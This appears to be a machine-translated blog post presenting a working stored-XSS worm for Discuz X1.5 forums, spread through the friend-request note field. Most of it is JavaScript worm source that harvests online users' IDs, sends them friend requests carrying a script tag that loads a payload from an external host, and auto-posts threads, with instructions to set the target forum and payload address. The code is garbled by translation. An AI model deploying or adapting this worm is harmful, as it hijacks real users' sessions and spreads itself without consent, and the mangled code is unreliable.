Discuz X1.5 worm worm spread using Add friends to store XSS

Discuz X1.5 stores XSS in places where friends are added, where XSS interacts with the user to spread the worm exponentially.

Location to add friends

The effect after X finishes

Trigger after click

OK with this storage XSS, we do worm propagation, DZ's session cookie is wounded http-only, but the effect of XSS is to get access to the user session under your current domain . This does not interfere with our worm's conduct.

Step 1:attacker Send with XSS worm payload to User A,

Step 2: User A clicks on itself as a host to add other people as a friend and comes with an attack payload

Step 3: By x users infected each other, exponential growth, in order to verify that all infected users will be we use JS control to send a post

No code says a jb,worm.

You need to modify

1 urlbase for your want 1.5 forum base Address

2 address of the payload storing XSS

//code for XSS test//Base site of the forumvarURLBase = "Http://forum.xxx.com";varAdd=function(UID) {varIfbox = window[' Ifbox ' | | (window[' Ifbox ']={}); varUyk = (NewDate ()). GetTime (); varIffame = Ifbox[uyk] =document.createelement ("iframe"); IFFAME.SRC=urlbase + "/home.php?mod=spacecp&ac=friend&op=add&uid=" +uid; Iffame.width=0;iffame.height=0; Iffame.onload=function(){        Try{//address for storing XSS payloadIfFame.contentDocument.getElementsByName ("note") [0].value= ' Hello<script src= ' http://xxx.xxx.xxx/js/dz.js ' ></script> '; IfFame.contentDocument.getElementById ("Addsubmit_btn"). Click (); Iffame=NULL; }Catch(Err) {}} document.body.appendChild (Iffame);}varNewthread =function(){    varIF1 = document.createelement ("iframe"); IF1.SRC= urlbase+ "/forum.php?mod=post&action=newthread&fid=21"; If1.width=0;if1.height=0; If1.onload=function(){        varDoc =if1.contentdocument; Doc.getelementbyid ("Subject"). Value = "Wow Kaka ~ ~ ~"; If1.contentDocument.getElementById ("E_iframe"). ContentDocument.body.innerHTML = "_______________</br>< XSS Worm Test ></br>----------                -----</br> \ ^__^</br> \ (oo) \_______</br> (__) \) \/\</br> ||     ----W |</br> | | || </br> "; Doc.getelementbyid ("Postsubmit"). Click (); If1.onload=function(){return false;} } document.body.appendChild (IF1);}varif0 = document.createelement ("iframe"); If0.src= URLBase + "/forum.php?showoldetails=yes#online"; If0.width=0;if0.height=0; If0.onload=function(){    varUli =if0.contentdocument.getelementsbytagname ("Li");  for(vari = 0;i<uli.length;i++){        if(Uli[i].title.length > 5){            varUID = uli[i].childnodes[3].href.substring (Uli[i].childnodes[3].href.indexof ("uid=") +4); varR = Math.Round (Math.random () * 10); //if (i%10 = = r) {                //Be gentle.Newthread ();          Add (UID); //  }}}}document.body.appendchild (if0);

There are a lot of holes in it, including the asynchronous loading of JS, the operation of elements across the IFRAME, and so on, hoping to provide help to others.

The actual worm effect is, 20 minutes to brush 30 pages, each page of 20 forum posts to the ~ ~

Discuz X1.5 worm worm spread using Add friends to store XSS